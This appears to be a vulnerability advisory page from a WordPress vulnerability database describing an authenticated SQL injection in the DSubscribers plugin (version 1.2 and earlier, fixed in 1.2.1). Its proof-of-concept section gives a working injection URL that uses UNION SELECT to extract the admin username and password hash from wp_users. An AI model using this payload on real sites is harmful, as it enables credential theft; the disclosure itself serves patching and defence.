DSubscribers <= 1.2 - Authenticated SQL Injection

Sign up to our free email alerts service for instant vulnerability notifications!

Proof of Concept
Proof of Concept:

1 – Login with admin user:

2 – Url attack:
 http://target/wp-admin/admin.php?page=dsubscribers&action=edit&dsubscribers=0 UNION SELECT 1,2,CONCAT(user_login,char(58),user_pass) FROM wp_users WHERE ID=1

Affects

Plugin dsubscribers
fixed in version 1.2.1

References

URL http://lenonleite.com.br/en/blog/2017/07/06/dsubscribers-1-2-plugin-wordpress-sql-injection/

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Lenon Leite / Log.pt
Submitter Website http://lenonleite.com.br/en/blog/2017/07/06/dsubscribers-1-2-plugin-wordpress-sql-injection/
Submitter Twitter log_oscon
Views 79
Verified No
WPVDB ID 8864

Timeline

Publicly Published 2017-07-06 (23 days ago)
Added 2017-07-16 (12 days ago)
Last Updated 2017-07-16 (12 days ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.